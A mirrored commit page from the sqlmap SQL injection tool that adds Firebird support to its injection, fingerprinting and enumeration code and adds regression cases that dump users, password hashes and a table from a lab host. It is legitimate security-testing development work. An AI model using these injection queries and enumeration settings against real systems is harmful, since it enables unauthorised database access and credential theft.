mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-05-06 08:43:47 +03:00
Merge branch 'master' of github.com:sqlmapproject/sqlmap
This commit is contained in:
Miroslav Stampar
commit
3f4c010370
|
|
@ -26,7 +26,7 @@ SMTP_SERVER = "127.0.0.1"
|
||||||
SMTP_PORT = 25
|
SMTP_PORT = 25
|
||||||
SMTP_TIMEOUT = 30
|
SMTP_TIMEOUT = 30
|
||||||
FROM = "regressiontest@sqlmap.org"
|
FROM = "regressiontest@sqlmap.org"
|
||||||
TO = "dev@sqlmap.org"
|
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
||||||
SUBJECT = "Regression test results on %s using revision %s" % (TIME, REVISION)
|
SUBJECT = "Regression test results on %s using revision %s" % (TIME, REVISION)
|
||||||
|
|
||||||
def prepare_email(content):
|
def prepare_email(content):
|
||||||
|
|
@ -87,18 +87,23 @@ def main():
|
||||||
|
|
||||||
test_counts.append(test_count)
|
test_counts.append(test_count)
|
||||||
|
|
||||||
console_output_fd = codecs.open(os.path.join(output_folder, "console_output"), "rb", "utf8")
|
console_output_file = os.path.join(output_folder, "console_output")
|
||||||
console_output = console_output_fd.read()
|
log_file = os.path.join(output_folder, "debiandev", "log")
|
||||||
console_output_fd.close()
|
traceback_file = os.path.join(output_folder, "traceback")
|
||||||
|
|
||||||
attachments[test_count] = str(console_output)
|
if os.path.exists(console_output_file):
|
||||||
|
console_output_fd = codecs.open(console_output_file, "rb", "utf8")
|
||||||
|
console_output = console_output_fd.read()
|
||||||
|
console_output_fd.close()
|
||||||
|
attachments[test_count] = str(console_output)
|
||||||
|
|
||||||
log_fd = codecs.open(os.path.join(output_folder, "debiandev", "log"), "rb", "utf8")
|
if os.path.exists(log_file):
|
||||||
log = log_fd.read()
|
log_fd = codecs.open(log_file, "rb", "utf8")
|
||||||
log_fd.close()
|
log = log_fd.read()
|
||||||
|
log_fd.close()
|
||||||
|
|
||||||
if traceback:
|
if os.path.exists(traceback_file):
|
||||||
traceback_fd = codecs.open(os.path.join(output_folder, "traceback"), "rb", "utf8")
|
traceback_fd = codecs.open(traceback_file, "rb", "utf8")
|
||||||
traceback = traceback_fd.read()
|
traceback = traceback_fd.read()
|
||||||
traceback_fd.close()
|
traceback_fd.close()
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -6,9 +6,18 @@
|
||||||
SQLMAP_HOME="/opt/sqlmap"
|
SQLMAP_HOME="/opt/sqlmap"
|
||||||
REGRESSION_SCRIPT="${SQLMAP_HOME}/extra/shutils"
|
REGRESSION_SCRIPT="${SQLMAP_HOME}/extra/shutils"
|
||||||
|
|
||||||
|
FROM="regressiontest@sqlmap.org"
|
||||||
|
TO="bernardo.damele@gmail.com, miroslav.stampar@gmail.com"
|
||||||
|
SUBJECT="Automated regression test failed on $(date)"
|
||||||
|
|
||||||
cd $SQLMAP_HOME
|
cd $SQLMAP_HOME
|
||||||
git pull
|
git pull
|
||||||
rm -f output 2>/dev/null
|
rm -f output 2>/dev/null
|
||||||
|
|
||||||
cd $REGRESSION_SCRIPT
|
cd $REGRESSION_SCRIPT
|
||||||
python regressiontest.py
|
python regressiontest.py 1>/tmp/regressiontest.log 2>&1
|
||||||
|
|
||||||
|
if [ $? -ne 0 ]
|
||||||
|
then
|
||||||
|
cat /tmp/regressiontest.log | mailx -s "${SUBJECT}" -aFrom:${FROM} ${TO}
|
||||||
|
fi
|
||||||
|
|
|
||||||
|
|
@ -535,7 +535,7 @@ class Agent(object):
|
||||||
elif fieldsNoSelect:
|
elif fieldsNoSelect:
|
||||||
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD):
|
||||||
if fieldsExists:
|
if fieldsExists:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
|
|
@ -822,8 +822,7 @@ class Agent(object):
|
||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
|
if " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
||||||
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
|
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
|
|
||||||
if query.startswith("SELECT "):
|
if query.startswith("SELECT "):
|
||||||
|
|
@ -831,6 +830,7 @@ class Agent(object):
|
||||||
limitedQuery = "%s FROM (%s,%s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
|
limitedQuery = "%s FROM (%s,%s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
|
||||||
else:
|
else:
|
||||||
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
|
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
|
||||||
|
|
||||||
limitedQuery = limitedQuery % fromFrom
|
limitedQuery = limitedQuery % fromFrom
|
||||||
limitedQuery += "=%d" % (num + 1)
|
limitedQuery += "=%d" % (num + 1)
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -175,7 +175,8 @@ class Dump(object):
|
||||||
for setting in settings:
|
for setting in settings:
|
||||||
self._write(" %s: %s" % (subHeader, setting))
|
self._write(" %s: %s" % (subHeader, setting))
|
||||||
|
|
||||||
self.singleString("")
|
if userSettings:
|
||||||
|
self.singleString("")
|
||||||
|
|
||||||
def dbs(self, dbs):
|
def dbs(self, dbs):
|
||||||
self.lister("available databases", dbs)
|
self.lister("available databases", dbs)
|
||||||
|
|
|
||||||
|
|
@ -167,6 +167,9 @@ def liveTest():
|
||||||
|
|
||||||
result = runCase(switches, parse)
|
result = runCase(switches, parse)
|
||||||
|
|
||||||
|
test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING)
|
||||||
|
test_case_fd.write("%s\n" % name)
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
logger.info("test passed")
|
logger.info("test passed")
|
||||||
cleanCase()
|
cleanCase()
|
||||||
|
|
@ -183,6 +186,7 @@ def liveTest():
|
||||||
errMsg += " - SQL injection not detected"
|
errMsg += " - SQL injection not detected"
|
||||||
|
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
test_case_fd.write("%s\n" % errMsg)
|
||||||
|
|
||||||
if failedParseOn:
|
if failedParseOn:
|
||||||
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
|
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
|
||||||
|
|
@ -199,6 +203,7 @@ def liveTest():
|
||||||
if conf.stopFail is True:
|
if conf.stopFail is True:
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
test_case_fd.close()
|
||||||
retVal &= bool(result)
|
retVal &= bool(result)
|
||||||
|
|
||||||
dataToStdout("\n")
|
dataToStdout("\n")
|
||||||
|
|
|
||||||
|
|
@ -23,6 +23,7 @@ from lib.core.common import incrementCounter
|
||||||
from lib.core.common import initTechnique
|
from lib.core.common import initTechnique
|
||||||
from lib.core.common import isListLike
|
from lib.core.common import isListLike
|
||||||
from lib.core.common import isNumPosStrValue
|
from lib.core.common import isNumPosStrValue
|
||||||
|
from lib.core.common import isTechniqueAvailable
|
||||||
from lib.core.common import listToStrValue
|
from lib.core.common import listToStrValue
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import unArrayizeValue
|
from lib.core.common import unArrayizeValue
|
||||||
|
|
@ -34,6 +35,7 @@ from lib.core.data import logger
|
||||||
from lib.core.data import queries
|
from lib.core.data import queries
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
|
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
|
||||||
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
|
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
|
||||||
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
|
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
|
||||||
|
|
@ -180,6 +182,9 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
|
||||||
else:
|
else:
|
||||||
expressionReplaced = expression.replace(expressionFields, field, 1)
|
expressionReplaced = expression.replace(expressionFields, field, 1)
|
||||||
|
|
||||||
|
if kb.technique == PAYLOAD.TECHNIQUE.QUERY and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
|
||||||
|
expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
|
||||||
|
|
||||||
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
|
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
|
||||||
|
|
||||||
if not kb.threadContinue:
|
if not kb.threadContinue:
|
||||||
|
|
|
||||||
|
|
@ -74,6 +74,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
|
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
|
||||||
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
|
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
|
||||||
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
|
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
|
||||||
|
# TODO: add test for Firebird 2.5
|
||||||
)
|
)
|
||||||
|
|
||||||
for i in xrange(len(table)):
|
for i in xrange(len(table)):
|
||||||
|
|
@ -122,7 +123,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
|
result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0" % (randInt, randInt))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
infoMsg = "confirming %s" % DBMS.FIREBIRD
|
infoMsg = "confirming %s" % DBMS.FIREBIRD
|
||||||
|
|
|
||||||
|
|
@ -16,6 +16,9 @@ class Syntax(GenericSyntax):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def escape(expression, quote=True):
|
def escape(expression, quote=True):
|
||||||
if isDBMSVersionAtLeast('2.1'):
|
if isDBMSVersionAtLeast('2.1'):
|
||||||
|
if expression == u"'''":
|
||||||
|
return "ASCII_CHAR(%d)" % (ord("'"))
|
||||||
|
|
||||||
if quote:
|
if quote:
|
||||||
while True:
|
while True:
|
||||||
index = expression.find("'")
|
index = expression.find("'")
|
||||||
|
|
|
||||||
|
|
@ -41,7 +41,7 @@ class Connector(GenericConnector):
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
|
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
|
||||||
except pymssql.OperationalError, msg:
|
except (pymssql.InterfaceError, pymssql.OperationalError), msg:
|
||||||
raise SqlmapConnectionException(msg)
|
raise SqlmapConnectionException(msg)
|
||||||
|
|
||||||
self.initCursor()
|
self.initCursor()
|
||||||
|
|
|
||||||
|
|
@ -513,22 +513,24 @@ class Databases:
|
||||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,
|
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,
|
||||||
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||||
query += condQuery.replace("[DB]", conf.db)
|
query += condQuery.replace("[DB]", conf.db)
|
||||||
elif Backend.isDbms(DBMS.SQLITE):
|
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
|
||||||
query = rootQuery.inband.query % tbl
|
query = rootQuery.inband.query % tbl
|
||||||
|
|
||||||
values = inject.getValue(query, blind=False, time=False)
|
values = inject.getValue(query, blind=False, time=False)
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
|
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
|
||||||
index, values = 1, []
|
index, values = 1, []
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
query = rootQuery.inband.query2 % (conf.db, tbl, index)
|
query = rootQuery.inband.query2 % (conf.db, tbl, index)
|
||||||
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
||||||
|
|
||||||
if isNoneValue(value) or value == " ":
|
if isNoneValue(value) or value == " ":
|
||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
|
|
@ -591,7 +593,7 @@ class Databases:
|
||||||
query += condQuery
|
query += condQuery
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl.upper())
|
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
|
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
|
|
@ -639,7 +641,7 @@ class Databases:
|
||||||
query += condQuery
|
query += condQuery
|
||||||
field = None
|
field = None
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
field = None
|
field = None
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
|
|
@ -659,7 +661,7 @@ class Databases:
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
||||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column)
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
|
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
|
||||||
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||||
|
|
@ -736,7 +738,11 @@ class Databases:
|
||||||
db = db.upper()
|
db = db.upper()
|
||||||
table = table.upper()
|
table = table.upper()
|
||||||
|
|
||||||
query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
|
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||||
|
query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True))
|
||||||
|
else:
|
||||||
|
query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
|
||||||
|
|
||||||
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||||
|
|
||||||
if isNumPosStrValue(count):
|
if isNumPosStrValue(count):
|
||||||
|
|
@ -759,7 +765,7 @@ class Databases:
|
||||||
if not conf.db:
|
if not conf.db:
|
||||||
conf.db, conf.tbl = conf.tbl.split(".")
|
conf.db, conf.tbl = conf.tbl.split(".")
|
||||||
|
|
||||||
if conf.tbl is not None and conf.db is None:
|
if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||||
warnMsg = "missing database parameter. sqlmap is going to "
|
warnMsg = "missing database parameter. sqlmap is going to "
|
||||||
warnMsg += "use the current database to retrieve the "
|
warnMsg += "use the current database to retrieve the "
|
||||||
warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl)
|
warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl)
|
||||||
|
|
|
||||||
|
|
@ -29,6 +29,7 @@ from lib.core.enums import PAYLOAD
|
||||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.settings import CURRENT_DB
|
from lib.core.settings import CURRENT_DB
|
||||||
|
from lib.core.settings import METADB_SUFFIX
|
||||||
from lib.request import inject
|
from lib.request import inject
|
||||||
from lib.techniques.brute.use import columnExists
|
from lib.techniques.brute.use import columnExists
|
||||||
from lib.techniques.brute.use import tableExists
|
from lib.techniques.brute.use import tableExists
|
||||||
|
|
@ -199,7 +200,7 @@ class Search:
|
||||||
if isinstance(values, basestring):
|
if isinstance(values, basestring):
|
||||||
values = [values]
|
values = [values]
|
||||||
for value in values:
|
for value in values:
|
||||||
newValues.append(["SQLite_masterdb", value])
|
newValues.append(["SQLite_%s" % METADB_SUFFIX, value])
|
||||||
|
|
||||||
values = newValues
|
values = newValues
|
||||||
|
|
||||||
|
|
@ -258,7 +259,7 @@ class Search:
|
||||||
if tblConsider == "2":
|
if tblConsider == "2":
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
foundTbls["SQLite_masterdb"] = []
|
foundTbls["SQLite_%s" % METADB_SUFFIX] = []
|
||||||
|
|
||||||
for db in foundTbls.keys():
|
for db in foundTbls.keys():
|
||||||
db = safeSQLIdentificatorNaming(db)
|
db = safeSQLIdentificatorNaming(db)
|
||||||
|
|
|
||||||
|
|
@ -888,6 +888,217 @@
|
||||||
<item value="r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'"/>
|
<item value="r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="Firebird boolean-based multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<excludeSysDbs value="True"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: this test case fails because of issue #358 -->
|
||||||
|
<case name="Firebird error-based multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: this test case fails because of issue #357 -->
|
||||||
|
<case name="Firebird UNION query multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: this test case fails because of issue #357 -->
|
||||||
|
<case name="Firebird partial UNION query multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int_partialunion.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
